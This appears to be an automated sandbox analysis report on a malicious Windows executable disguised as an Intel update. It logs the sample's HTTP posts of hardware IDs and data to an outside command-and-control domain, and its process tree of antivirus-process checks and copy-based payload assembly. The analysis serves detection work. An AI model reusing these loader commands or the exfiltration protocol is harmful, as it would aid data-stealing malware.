hrzCI4WCfMOao8cFg0ptzCwvaXPO76vxh3R/ApzE0b57iLN6sI6Il34bfkUvFlT1nE5lJjZOdtTWDHfTkf3do07AmmPd1jHDmqPHBYNKbcxYB00bYhs3qWPNw9KM3NG31mHav4mCPOd/WkpN/gsBxCh7QQM7H+Nck/EvlpCkwb57iON6sI4Il34bfn2DYn3E4Qs4Q28WFviiNT6b8Z3Ah3aM3kPdxnTHbgN+UWfy3OiYc2kHAgcvTWOpb46MZCR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	50739	104.21.64.1	443	6596	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 14:45:58 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6H7HXKT5W9NQT User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12831 Host: sputnik-1985.com
2025-01-07 14:45:58 UTC	12831	OUT	Data Raw: 2d 2d 36 48 37 48 58 4b 54 35 57 39 4e 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 36 48 37 48 58 4b 54 35 57 39 4e 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 48 37 48 58 4b 54 35 57 39 4e 51 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 0d 0a 2d 2d 36 48 37 48 58 4b 54 35 57 Data Ascii: --6H7HXKT5W9NQTContent-Disposition: form-data; name="hwid"E7DB78645975D310822D1F4978021086--6H7HXKT5W9NQTContent-Disposition: form-data; name="pid"2--6H7HXKT5W9NQTContent-Disposition: form-data; name="lid"HpOoIh--@MrSalt--6H7HXKT5W
2025-01-07 14:45:59 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 14:45:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f14pr2jg6odtl57g9co59vh4iq; expires=Sat, 03 May 2025 08:32:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2BhE%2FirEj6qWzOh5FarvG7ytdbTOVhT97lARIzfwn488y8OECImWJ5tHn3s9UnWqB7blHkd2weUe0kpFfKbRbbz9IcIEOPXiXMUAuLPkgUAaw1DBCsCaZt23UTuKm2y%2FUj%2Fw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe4bc12dcfdc358-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1685&rtt_var=639&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13766&delivery_rate=1701631&cwnd=155&unsent_bytes=0&cid=c7a87ff9b1f224dc&ts=595&x=0"
2025-01-07 14:45:59 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-07 14:45:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	50740	104.21.64.1	443	6596	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 14:45:59 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ETDM57XEJA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15059 Host: sputnik-1985.com
2025-01-07 14:45:59 UTC	15059	OUT	Data Raw: 2d 2d 45 54 44 4d 35 37 58 45 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 45 54 44 4d 35 37 58 45 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 54 44 4d 35 37 58 45 4a 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 0d 0a 2d 2d 45 54 44 4d 35 37 58 45 4a 41 0d 0a 43 6f 6e 74 65 6e Data Ascii: --ETDM57XEJAContent-Disposition: form-data; name="hwid"E7DB78645975D310822D1F4978021086--ETDM57XEJAContent-Disposition: form-data; name="pid"2--ETDM57XEJAContent-Disposition: form-data; name="lid"HpOoIh--@MrSalt--ETDM57XEJAConten
2025-01-07 14:46:00 UTC	1123	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 14:46:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=inqfan4cl7mtggt4mvt0sfbntn; expires=Sat, 03 May 2025 08:32:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gHsywU%2BXxAnDWsqllTPYHs68ZkmS8iVar4HH3H4EsrKFn9xImRwjCkHE%2BoCHBBuzxTh0LP6bkolgG6sux53jR7xyJGMNh5l3F5PqDIm00yfYHxmHrinEUgyWdAiau0JjFCqs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe4bc1a0d6bde95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1668&rtt_var=641&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2841&recv_bytes=15991&delivery_rate=1684939&cwnd=242&unsent_bytes=0&cid=753559b3f9130728&ts=424&x=0"
2025-01-07 14:46:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-07 14:46:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	50741	104.21.64.1	443	6596	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 14:46:01 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IMCRUI6Y User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19905 Host: sputnik-1985.com
2025-01-07 14:46:01 UTC	15331	OUT	Data Raw: 2d 2d 49 4d 43 52 55 49 36 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 49 4d 43 52 55 49 36 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 49 4d 43 52 55 49 36 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 0d 0a 2d 2d 49 4d 43 52 55 49 36 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 Data Ascii: --IMCRUI6YContent-Disposition: form-data; name="hwid"E7DB78645975D310822D1F4978021086--IMCRUI6YContent-Disposition: form-data; name="pid"3--IMCRUI6YContent-Disposition: form-data; name="lid"HpOoIh--@MrSalt--IMCRUI6YContent-Dispos
2025-01-07 14:46:01 UTC	4574	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 02 0e 8d a5 f6 3d 72 d7 Data Ascii: 2+?2+?o?Mp5p_oI=r
2025-01-07 14:46:01 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 14:46:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u87lj2sbo9kovecjj4a067ec1n; expires=Sat, 03 May 2025 08:32:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2FOfG2ZVGb4RVK9TCPpnfgEg2lVKOLddlYJ3M9kO3cb49VVEL4thyxka4rqINljD2AeyJjRul9Rmpu6PeTx%2B%2F7%2B4C8mkxK8YGwetbuaSxzdLkVWBjYoRdffS9PDjeZF3%2BQnv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe4bc20da0bde95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1595&rtt_var=619&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=20857&delivery_rate=1738095&cwnd=242&unsent_bytes=0&cid=06f08556162db9ff&ts=660&x=0"
2025-01-07 14:46:01 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-07 14:46:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	50742	104.21.64.1	443	6596	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 14:46:02 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6KRRDE5XR5UF0L User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 901 Host: sputnik-1985.com
2025-01-07 14:46:02 UTC	901	OUT	Data Raw: 2d 2d 36 4b 52 52 44 45 35 58 52 35 55 46 30 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 36 4b 52 52 44 45 35 58 52 35 55 46 30 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 4b 52 52 44 45 35 58 52 35 55 46 30 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 0d 0a 2d 2d 36 4b 52 52 44 45 Data Ascii: --6KRRDE5XR5UF0LContent-Disposition: form-data; name="hwid"E7DB78645975D310822D1F4978021086--6KRRDE5XR5UF0LContent-Disposition: form-data; name="pid"1--6KRRDE5XR5UF0LContent-Disposition: form-data; name="lid"HpOoIh--@MrSalt--6KRRDE
2025-01-07 14:46:02 UTC	1129	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 14:46:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ri7erqlhtiqvb9d0ipllqdq7hb; expires=Sat, 03 May 2025 08:32:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=goXvU%2BT6c7rGqtEwGFx9mkSRZFtG5s5XnHT24NtlKhU%2FpW5ib4fJXHHLgNXz7%2FO184oVH9G%2Fig3zogHnqeULLz%2BDtnY36dZ3DG2wKk3meVQSFPGUVQ0ZKsMnbv%2FBHz3yP%2F1Y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe4bc2938a842e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1711&rtt_var=855&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4220&recv_bytes=1813&delivery_rate=106208&cwnd=240&unsent_bytes=0&cid=6db52dc23de2f83a&ts=374&x=0"
2025-01-07 14:46:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-07 14:46:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	50743	104.21.64.1	443	6596	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 14:46:03 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=RI2MFGUI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1074 Host: sputnik-1985.com
2025-01-07 14:46:03 UTC	1074	OUT	Data Raw: 2d 2d 52 49 32 4d 46 47 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 52 49 32 4d 46 47 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 52 49 32 4d 46 47 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 0d 0a 2d 2d 52 49 32 4d 46 47 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 Data Ascii: --RI2MFGUIContent-Disposition: form-data; name="hwid"E7DB78645975D310822D1F4978021086--RI2MFGUIContent-Disposition: form-data; name="pid"1--RI2MFGUIContent-Disposition: form-data; name="lid"HpOoIh--@MrSalt--RI2MFGUIContent-Dispos
2025-01-07 14:46:04 UTC	1126	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 14:46:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=l1i8bc7ua6kps75a9o0tb770u6; expires=Sat, 03 May 2025 08:32:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QlA3fC4VE5WliCb78Pplp3YfDGpbJ%2BmpuPsCVWv2ZXY%2FiilF0cS1Bh0eDrnZqhzHf%2BGc%2F%2BremNxhbUkjGzoIiRUlvcts0ZqUxieEJg7XvVobDv1v58YDN23PTN18yEtDXjOR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe4bc313bd07c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2273&min_rtt=2070&rtt_var=922&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1981&delivery_rate=1410628&cwnd=218&unsent_bytes=0&cid=86f57ba89fe6bece&ts=550&x=0"
2025-01-07 14:46:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-07 14:46:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	50744	104.21.64.1	443	6596	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\686536\Hugo.com

Timestamp	Bytes transferred	Direction	Data
2025-01-07 14:46:04 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 116 Host: sputnik-1985.com
2025-01-07 14:46:04 UTC	116	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 4d 72 53 61 6c 74 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 45 37 44 42 37 38 36 34 35 39 37 35 44 33 31 30 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--@MrSalt&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=E7DB78645975D310822D1F4978021086
2025-01-07 14:46:05 UTC	1125	IN	HTTP/1.1 200 OK Date: Tue, 07 Jan 2025 14:46:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=g9p9amo0g73kp7gfg579thmcq5; expires=Sat, 03 May 2025 08:32:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6psQxi0PI4SZjz%2BTql5Nm2vyS3v%2Blh0lOcZO3et%2BIUWc58dPPJcWt9NjEh9sZwTFDlyrj5%2BGch35rBDF7CaMykF9pOmmvRnBH4WsQ3QamaxJl7iRXd4WrcYnz%2BMgUiX9CVP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fe4bc3879068ca1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1943&min_rtt=1943&rtt_var=971&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4220&recv_bytes=1017&delivery_rate=254355&cwnd=168&unsent_bytes=0&cid=c50fcc35c48cc858&ts=622&x=0"
2025-01-07 14:46:05 UTC	54	IN	Data Raw: 33 30 0d 0a 2f 61 6e 37 36 42 35 75 64 31 46 41 52 49 64 37 62 44 37 4f 73 63 38 66 2b 6c 5a 46 75 51 49 52 58 34 71 6b 63 37 30 46 50 66 4b 6d 39 41 3d 3d 0d 0a Data Ascii: 30/an76B5ud1FARId7bD7Osc8f+lZFuQIRX4qkc70FPfKm9A==
2025-01-07 14:46:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:45:12
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\[UPD]Intel_Unit.2.1.exe"
Imagebase:	0x400000
File size:	1'119'746 bytes
MD5 hash:	25B4BAC0866214DF0BCB32A8DC280555
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:45:13
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c move Cloudy Cloudy.cmd & Cloudy.cmd
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:45:13
Start date:	07/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:45:16
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xff0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:45:16
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0xca0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:45:16
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xff0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:45:16
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0xca0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:45:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 686536
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:45:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	extrac32 /Y /E Justify
Imagebase:	0xc70000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:45:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Backing" Kelly
Imagebase:	0xca0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:45:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b 686536\Hugo.com + Ware + Sanyo + Pg + Folk + Lifetime + Robert + Enlarge + Hence 686536\Hugo.com
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:45:17
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Selection + ..\Suse + ..\Illustrations + ..\Alerts + ..\Smart + ..\Steps + ..\Lovers y
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:45:17
Start date:	07/01/2025
